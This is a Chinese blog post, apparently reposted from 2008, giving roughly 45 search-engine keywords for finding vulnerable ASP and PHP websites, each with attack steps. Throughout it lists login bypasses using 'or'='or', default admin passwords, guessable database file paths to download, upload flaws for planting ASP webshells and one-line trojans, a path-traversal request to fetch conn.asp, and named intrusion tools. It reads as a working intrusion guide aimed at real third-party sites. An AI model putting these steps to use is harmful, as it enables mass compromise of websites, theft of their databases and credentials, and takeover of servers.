用搜索引擎搜关键字找网站漏洞

  用google搜关键字找网站漏洞!2008年05月12日星期一下午01:161:到GoogLe,搜索一些关键字,edit.asp?韩国肉鸡为多,多数为MSSQL数据库!

  2,到Google,site:cq.cninurl:asp

  3,

  利用挖掘鸡和一个ASP木马.

  文件名是login.asp

  路径组是/manage/

  关键词是went.asp

  用'or'='or'来登陆

  4,这个应该N多人都搞过吧。。

  关键字:CoNetMIBVer1.0网站后台管理系统

  帐号密码为'or'='or'

  5.动感购物系统呵呵。想到了明小子

  inurl:help.asp登陆,如未注册成为会员!

  upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

  6。默认数据库地址blogdata/acblog.asa

  关键字:acblog

  7.

  百度/htdocs

  注册里可以直接上传asa文件!

  8.

  /Database/#newasp.mdb

  关键词:NewAspSiteManageSystemVersion

  9.

  用挖掘机

  关键字:PoweredbyWEBBOY

  页面:/upfile.asp

  这个。。。。。。。不用说了。--!

  10.

  baidu中搜索关键字Ver5.0Build0519

  (存在上传漏洞)

  11.

  Upfile_Article.aspbbs/upfile.asp

  输入关键字:poweredbymypower,

  应该是动什么上传漏洞来着?用的人也比较多

  工具明小子挖掘鸡就可以了

  12.

  inurl:winnt\system32\inetsrv\

  在google里面输入这个就可以找到很多网站

  13.

  现在GOOGLE搜索关键字intitle:网站小助手inurl:asp

  14.

  关键字:首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛

  挖掘鸡的关键字添setup.asp

  15.

  VBulletin论坛的数据库

  默认数据库地址!

  /includes/functions.php

  工具:

  1.网站猎手下载地址:百度Google!

  2.Google

  关键字:

  Poweredby:vBulletinVersion3.0.1

  Poweredby:vBulletinVersion3.0.2

  Poweredby:vBulletinVersion3.0.3

  其中一个就可以了

  16.

  1.打开百度或GOOGLE搜索,输入poweredbycomersusASPshoppingcart

  opensource。

  这是一个商场系统。

  2.网站的最底部分,有个ComersusOpenTechnologiesLC。打开看下~~comersus系统~

  猜到,comersus.mdb.是数据库名

  数据库都是放在database/后的,

  所以database/comersus.mdb

  comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。

  那样把前一个''store/''除去,再加上database/comersus.mdb试试

  都是默认数据库地址

  17.无忧传奇官方站点程序。

  1、后台管理地址:http://您的域名/msmiradmin/

  或者是http://您的域名/admin.asp

  2、默认后台管理帐号:msmir

  3、默认后台管理密码:msmirmsmir或msmir

  数据库文件为http://您的域名/msmirdata/msmirArticle.mdb

  或者是http://您的域名/msmirdata/msmirArticle.asa

  数据库连接文件为***********/Conn.asp

  也是默认数据库地址。现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`

  18.

  百度里输入/skins/default/

  这个没试过。。。

  19.利用挖掘机

  关键机:powerbyDiscuz

  路径:/wish.php

  配合:

  Discuz!论坛wish.php远程包含漏洞

  20.

  上传漏洞.

  工具:当然还是明小子了

  网站猎手或者挖掘鸡了。

  关键字poweredbymypower

  检测的页面或文件插入upfile_photo.asp

  这个用的人也N多。。

  21.新云漏洞

  这个漏洞ACCESS和SQL版通吃。

  Google搜索关键字"关于本站-网站帮助-广告合作-下载声明-友情连接-网站地图-管理登录"

  把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp

  以源码,软件等下载站居多。

  大家时常碰到数据库如果前面或者中间+了#可以用%23替换就可以下载了

  \database\%23newasp.mdb

  如:#xzws.mdb改成%23xzws.mdb

  22.

  通吃所有商城+动力上传系统

  使用工具:挖掘鸡v1.1明小子

  商城入侵:

  关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成

  漏洞页面:upload.asp

  upfile_flash.asp

  还是上传漏洞拿webshell

  23.

  注射漏洞

  百度搜索:oioj'sblog

  24

  动易

  列目录

  admin_articlerecyclebin.asp

  inurl:admin_articlerecyclebin.asp

  25.

  工具:网站猎手

  关键词:inurl:Went.asp

  后缀:manage/login.asp

  口令:'or'='or'

  这软件还不是太熟悉。--

  26.

  入侵魔兽私服

  需要的工具:ASP木马--!废话了。

  明小子

  关键字:AllRightReservedDesign:游戏联盟

  后台地址:admin/login.asp

  数据库的地址:chngame/#chngame.mdb

  都默认的。数据库闹下来自己解密吧不多说了。

  27.

  漏洞是利用管理员iis设置的失误

  用baidu关键字就是比较罕见的脚本名

  动网:ReloadForumCache.asp

  Leadbbs:makealltopanc.asp

  BBSXP:admin_fso.asp

  动易:admin_articlerecyclebin.asp

  28.

  国外站的爆库漏洞

  关键字:sadRaven'sGuestbook

  密码地址:/passwd.dat

  后台地址:/admin.php

  29.

  Discuz4.1.0跨站漏洞

  利用工具:1,WAP浏览器

  2,WAP编码转换器

  关键字:"intext:Discuz!4.1.0"

  WAP浏览器..............................!!

  30.

  关键字:尚奈克斯

  后台路径/system/manage.asp

  直接传ASP木马

  31.

  工具

  1:网站猎手

  2:大马

  关键字:切勿关闭Cookies功能,否则您将不能登录

  插入diy.asp

  32.

  关键字:Team5StudioAllrightsreserved

  默认数据库:data/team.mdb

  33.

  工具:挖掘机辅臣数据库读取器

  关键字:企业简介产品展示产品列表

  后缀添加:/database/myszw.mdb

  后台地址:admin/Login.asp

  都默认的。一样。数据库闹下来自己解密码去。就行了。。--

  34.

  关键子XXXinurl:Nclass.asp

  在"系统设置"里写个木马。

  会被保存到在config.asp内。

  35.

  不进后台照样拿动网WEBSHELL

  data.asp?action=BackupData动网数据库备份默认路径

  36.

  工具:网站猎手WebShell

  关键字:inurl:Went.asp

  后缀:manage/login.asp

  弱口令:'or'='or'

  37.

  关键字:Poweredby:QCDN_NEWS

  随便扫遍文章加一个',来试探注入点

  后台地址:admin_index.asp

  用啥工具我就不说了吧。。。。。。。。。

  38.

  入侵雷池新闻发布系统

  关键字:leichinews

  去掉leichinews后面的.

  打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp

  再上传马.....

  进访问uppicanran.asp登陆马.

  39.

  工具挖掘机就行了。

  关键字:PowerSystemOfArticleManagementVer3.0Build20030628

  默认数据库:database\yiuwekdsodksldfslwifds.mdb

  后台地址:自己扫描!

  工具明小子。--!怎么又是他啊。

  MD5自己解.........

  (NND这个一扫一大堆。大家可以去试试。。)

  40.

  一、通过GOOGLE搜索找大量注入点

  关键字:asp?id=1gov.jp/asp?id=

  页数:100

  语言:想入侵哪个国家就填什么语言吧

  42

  关键字:Poweredby:94KKBBS2005

  利用密码找回功能找回admin

  提问:ddddd回答:ddddd

  42.

  关键字:inurl:Went.asp

  后台为manage/login.asp

  后台密码:'or'='或者'or''=''or'登录进入

  默认数据库地址:Database/DataShop.mdb

  43.

  关键字:******inurl:readnews.asp

  把最后一个/改成%5c,直接暴库,看密码,进后台

  随便添加个新闻在标题输入我们的一句话木马

  44.

  工具:一句话木马

  BBsXp5.0sp1管理员猜解器

  关键词:poweredbybbsxp5.00

  进后台,备份一句话马!

  45.

  关键字:程序核心:BJXSHOP网上开店专家

  后台:/admin

猜你喜欢

转载自yinkang2010.iteye.com/blog/1934089